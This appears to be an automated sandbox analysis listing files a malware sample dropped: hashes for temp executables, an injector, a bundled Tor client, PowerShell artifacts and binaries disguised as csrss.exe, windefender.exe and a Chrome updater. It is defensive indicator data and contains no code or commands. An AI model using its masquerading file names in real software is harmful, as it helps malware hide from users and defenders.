C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\6ABE.exe.log

MD5 9f5d0107d96d176b1ffcd5c7e7a42dc9
SHA1 de83788e2f18629555c42a3e6fada12f70457141
SHA256 d0630b8466cebaaf92533826f6547b6f36a3c480848dc38d650acd52b522a097
SHA512 86cfaa3327b59a976ddd4a5915f3fe8c938481344fcbd10e7533b4c5003673d078756e62435940471658a03504c3bc30603204d6a133727a3f36c96d08714c61

C:\Users\Admin\AppData\Local\Temp\6ABE.exe

MD5 d497d6f5d3b74379d1ca2e1abde20281
SHA1 937aac5cf9191e833724edda2742ed115a5237c7
SHA256 a1765648a41eea21fd942776cba9b50705673d8f7564ae7f8c9751eda9e2e564
SHA512 bdb28622542e3b34e40b37a189a967b6136963200fec616c6147fd36bb543b94a7d64128d5fbd65a5358b1131dc265c7cbdb1240fece3e8c09652b97c4c025a6

memory/3556-211-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp

memory/3556-212-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp

memory/3556-214-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp

memory/3556-218-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp

memory/3556-220-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp

memory/3556-226-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp

memory/3556-230-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp

memory/3556-238-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp

memory/3556-240-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp

memory/3556-236-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp

memory/3556-234-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp

memory/3556-232-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp

memory/3556-228-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp

memory/3556-224-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp

memory/3556-222-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp

memory/3556-216-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_12axlfji.xpk.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 c067b4583e122ce237ff22e9c2462f87
SHA1 8a4545391b205291f0c0ee90c504dc458732f4ed
SHA256 a16dbcd03a7549fbaf7cad1bedd01dcb961a5d43c873f1d1a50892618a06662e
SHA512 0767cba9f10154b4e28cf6a55b6fc827a96c4fbc88e2d67acd645a0a7a604a3beb63ea58d7febcf8b17de1ea3d2097e76ceac1b36b9fecf9a0945a31a9e211c3

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 3d086a433708053f9bf9523e1d87a4e8
SHA1 b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA256 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 1f97138cbf4adb76aa8e557c25ced070
SHA1 6abc938a044f15d11a5c3f2c2ea1c3d15ed460d5
SHA256 57e27086d196f5ab95faab4bd72fd608eb13b4f70ab7fa1e15cf846d67b3f64d
SHA512 8e7f0228ae05d86b9ed65279a4904e04eedd5c4ad030373b05f84990ceb1b942e208ef94fecea100f685d1e9690fceda2a4e96075059bdb2cd240f348908ebb9

C:\Users\Admin\AppData\Roaming\Tags\Settings.exe

MD5 73ae6c3b85c619aa3fb06de545597251
SHA1 eb1aebe3b76ca3a2b5075880a307c7da2a7d4526
SHA256 622b9f4f5d1eb80a8d6c0384d4c2cc62db85499005cbc5efb35e0fd343db7427
SHA512 912a6aac98a5e83d9519b9bb40efebe843d5265768a702c5523161ba2edd422d7c7d743eaac8c5ddab6719f2500a9826979baab2ed22d0bd7d6be66f56d59923

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 81e219617f0f5835723d7920b8387504
SHA1 790ca8b4b2c2412d569497270e2c5a7fc2196536
SHA256 a937f01ca7c5e481c72593fa847c302939665933173f53428ab43491c4f62a7d
SHA512 02b2ba7656d9ad5b2b850ba6fb04be2a10a10f5e275ab592514f185d084744c1b5597dbdf0c8745e0ffc3bbde5768c2ff3aa05417b2a7aecff9b7c0ed36bdb36

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Roaming\Tags\Settings.exe

MD5 73ae6c3b85c619aa3fb06de545597251
SHA1 eb1aebe3b76ca3a2b5075880a307c7da2a7d4526
SHA256 622b9f4f5d1eb80a8d6c0384d4c2cc62db85499005cbc5efb35e0fd343db7427
SHA512 912a6aac98a5e83d9519b9bb40efebe843d5265768a702c5523161ba2edd422d7c7d743eaac8c5ddab6719f2500a9826979baab2ed22d0bd7d6be66f56d59923

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 62623d22bd9e037191765d5083ce16a3
SHA1 4a07da6872672f715a4780513d95ed8ddeefd259
SHA256 95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010
SHA512 9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

C:\Windows\rss\csrss.exe

MD5 15ccfec965d35354a2142fac5324dcb3
SHA1 4147dc51f89f068e1dd86746e00cb6e6f2a3fc4f
SHA256 4b275ec3c098c462846995c7281e90284059904e5494ce9b8cfd21571978198b
SHA512 3513db0d2f52873a5a23b29735e95e505ad0fea292771b5dc8df03dc100d1b5ecbb619842df7179b4c7452cb1cdd00691e23f9f8f98d436f587cd237d34f9500

C:\Windows\rss\csrss.exe

MD5 5ede9444cd75f9459b2e9b342459f505
SHA1 ff1ba9423b3eb54a92acf4b70ec5e8d4f7d26627
SHA256 339ab9ea5338eec72519fa58ec8bb6733d25eff99e496031e1b1ddef936384c2
SHA512 f28278aaf5f762dd276e52f8d20651a3298892a268cfbe5459828dfa2b37ec3762061475e36738d1646e35ed6570d596742a454f4cf0c46b9eaef280286f88f4

C:\Users\Admin\AppData\Local\Temp\29EA.exe

MD5 5a45609af5960a9c4dbc014c4b5d244c
SHA1 b7bf85e0744b6cadb9ab9455b30ea834f39faf7f
SHA256 203fc9ad7667f1dcff5617a0659a69ca00b50cee6e16d3d6d5b954d77da9f804
SHA512 8096d82113efb5ca683c54581203c323af02748583e790310e63f702e9f0f2f20fbcc601d45201a4651432a644657998e7969ea4ceea618b6be6f1dfd52a74de

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 32a27baad5f258034ce06ac6af2f50d9
SHA1 f66f4139e0a93f52124d574c7b2ac4bdb86003c8
SHA256 06b33d357ebfaa95a0bf8ceb20fedc532429e41890eb0f9aa7ff657f1d352eb2
SHA512 25c75feae11baf22deb122469a72ce06ee08e38ee12325ff5021829092fad935694f9a6e3029ac4570b95440f9b967586d21630ec1e08736aa347eba0be5d334

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 7cb0337b756d69a7be3033dd6e382832
SHA1 baa60488b56bf731f0b819cb6ec776cc26af2369
SHA256 19ded27b35a890678e81e21c70cc763137f03d4febca3292b68fc1f044b8750e
SHA512 dc0876bba041e50161038b6de01fae930ebeef81807192a850113b5a2272a06cf9104214c27fbdd3028874e55a2c162b1da5018b80fb518944084d7763d78ce3

C:\Program Files\Google\Chrome\updater.exe

MD5 95da659749eface0e13cfb3d0e14066a
SHA1 bd603217113e715b5b2db6728ad7e82d2def6691
SHA256 41918960565fee217f130bfe086619658754b4d891612287c0b855bd34cdb4c1
SHA512 2b0e3f07b0c74775e9dd10b2f82dd22f7e6800f8c6d333b9551272a7858394c5c17ef0139b235f76bab75199ece2103e583ac9f63cc7bcf95188c3d69076228a

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 6bfa1a8bfcd8eb3af582a86a9ab3c742
SHA1 398fcd6058976d0d2ce35837de57eaf41f8cd852
SHA256 8487b79837e76c55c238e74aed5fa5149c1a968843909cc761c3065461b4ff0b
SHA512 ce17087ffab56c3465e79d0625847accab9d4fda12a7ae3755c205f3e3aff4fe53a6625954dccb550d4b31bebfc47865d40a5b58269b7730d5b2839a6e9435c7

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 e05eafdd49496642c93745c94d61c128
SHA1 7108db5d99ae116a283c7203ce3c55f3e222b620
SHA256 53eb2bc0ed32d4184e202ae5602b31b2dfc3207bc0b2bee56f38bce02dbd8dc5
SHA512 b34f56b5a82e8dd6d08fdbad72ca8aee168a7d3a78ebba69f5446b8e58bf6407a29b44389d11ab6ab69a30259894a520f8db8f643220799ad18e4e4c3f3d4494

C:\Users\Admin\AppData\Local\Temp\6D0E.exe

MD5 36dfcd31a45ce2c580f008b20e6cd2ad
SHA1 a245d87d7ef799d9aded126e39d5372fb430139e
SHA256 3bcc0a133a93c3e05b01f496eb9c27b8c74104d5857dfb93aa8a08e6989520ac
SHA512 72971986db21b0023971361c825de2599c2ae4c5d8e837226a11f4363cdb9da671a5078c09dd72d62f4b8ecc1071051918b37d297a6d7a991f539d102236942d

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7e00b0c35233794af15148d463815bec
SHA1 d8cee4abcc48d649d103345e4526b3c6fdf03178
SHA256 9e1c6d4262a26af1582583523b00e275b661df50a81f7ea967f7b60f4545d58c
SHA512 04d3b2578827b7cd15c491a71a7145e7bb54263c40de9b4703895e1dbe65ce756e067c1b756e9e05bc2a36ef68d1ba1205bf04e32b8ba7f2ccaa5b44faf85f69

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Users\Admin\AppData\Local\Temp\8DE5.exe

MD5 e519e00feb6e0534ba2154b9e865c184
SHA1 f4f4980c16a9aaa7c331811be95dd9900f5a09b9
SHA256 d694d11e2ced3fdd0ce34ab097ac2dc50db3e3ce026d65426a37b294ea4b90eb
SHA512 a86d68795f0c774b2aef7ad4e4b90f21d67757255d171ff2bea753381aabd040f63048cda43ea852827c5b01da83ffa0b1236667b991d331710b9526106fd4ef

C:\Windows\windefender.exe

MD5 438fd3bcbc8794dcc50fb770b7bbc271
SHA1 f9242a03498fcd58766079919fc07c2d12aacef2
SHA256 c66c679eeedf575beeed45e9968c231c74eac6404ea945dff4abfa8852ec6841
SHA512 5fd76745ecc510697a0405fbf79960b36042a88096f97d5fb6e99fe5abf168b3af073d9ba88273b0f4087bcc313aee625b93261d189ce72af21583bf2f08edd4

C:\Windows\windefender.exe

MD5 b5041f6d6e06f6ef2c9a57b7f71bd754
SHA1 ebd4fbce7add1fc506fe8acfd3a16754dadd067d
SHA256 1d0db51ce2bf3a8d6c51bc2a912e8085fb32f4b7776057243f9bc868a4d71199
SHA512 2863415208e05e54459ef4711fa83f4c636384887ace921f0039ad5f4c9ab14488032c5c96070f906839c74ce148c78ed4a3a503821fd37d0aa84222c48a7c50

C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\libcrypto-1_1.dll

MD5 b7c32c8e7d21aa9b79470037227eba43
SHA1 38d719b10ca035cee65162c1a44e2c62123d41b4
SHA256 99b4042a858a9e437917c8256692e9ba161b87054ccf5e22538e86bb35c34f23
SHA512 d85345380b9605c8484e11873218aa4eaeea573ca51eedada6d0518695a2b184bb22faf7c5e3d88330935774ced17e9d80c577b06603aa1ca6dab748b0bd15a7

C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\libevent-2-1-7.dll

MD5 736443b08b5a52b6958f001e8200be71
SHA1 e56ddc8476aef0d3482c99c5bfaf0f57458b2576
SHA256 da1f75b9ce5f47cb78a6930a50c08397ee4d9778302746340f4057fcd838dbf4
SHA512 9dfcdb1186b089e7961767d427de986ad8e5f7715b7592984349d0b8e7f02198137c83e8c79a096a7475ad9f4695f52539fa08fa65912860ddf0a85515a7cda1

C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\libssp-0.dll

MD5 7cdbaca31739500aefc06dd85a8558ff
SHA1 adc36ec6a3cdc7e57a1b706c820e382627f6cb90
SHA256 0a1dee5dd5234971f7526f3d5f8b7e2cfdcb536e18debd51c985010fb504fbdb
SHA512 6df8ac9054f27ebbef9642ce79ff7ba836411ea0ed0bd04b3cfe724a336a91f665c2cc0b7a4bfc99a80786d1a6d361b971a7dbb7a298b919a1baa812541841ba

C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\libevent-2-1-7.dll

MD5 736443b08b5a52b6958f001e8200be71
SHA1 e56ddc8476aef0d3482c99c5bfaf0f57458b2576
SHA256 da1f75b9ce5f47cb78a6930a50c08397ee4d9778302746340f4057fcd838dbf4
SHA512 9dfcdb1186b089e7961767d427de986ad8e5f7715b7592984349d0b8e7f02198137c83e8c79a096a7475ad9f4695f52539fa08fa65912860ddf0a85515a7cda1

C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe

MD5 16f6d83195f39bda25fef182fd1ac5c4
SHA1 cb8d57181bf338c1e36f8baba92d7453569f58b1
SHA256 e35a3356b6c1565c842ceb03a311da29740a036894c42bee0d23efd5563a9cb5
SHA512 fd04fa2f660601a70555719feb8598c33bce0c882957079f4723908c6ce90613b4b6ce9e38ba0565e6c2479acfce4bef91a587a2fc632f2e84b65587abe2fa3a

C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe

MD5 58edee3c1e45c722f305f465e4d2d257
SHA1 fb299dcd6d7da4383b5cad4f232f9b27695c6299
SHA256 4f750d3088bbccb4822a84384092d85d605c8b3adc09b5f6245f4485a9ebf786
SHA512 22a0ebaf2bbc9099cdc8305642106785663b7c9ed7867dca171536f6ac92ebee90c4bcf01ebe9c59b493bdbe9d2bb324f9ccb22c343729ed55ad8fedd8ccc91d

C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\cached-microdesc-consensus.tmp

MD5 fd6962e009deecea212d5b1fc87f0b05
SHA1 4e81c663018c08624c1f8db07fe115b19d1323ce
SHA256 40f2a6e756e24334222220a2b38cf7124a97d8af031bf5232fe8f5e4322d2220
SHA512 c72533565dece8cd70a88ca1d0460fd1ccebb7c4ebd75a0e1b57bc9f601926aac3330eb076bd319b052eede641a37b46db3e8d39d0e2d51488b23f37bf5aa88b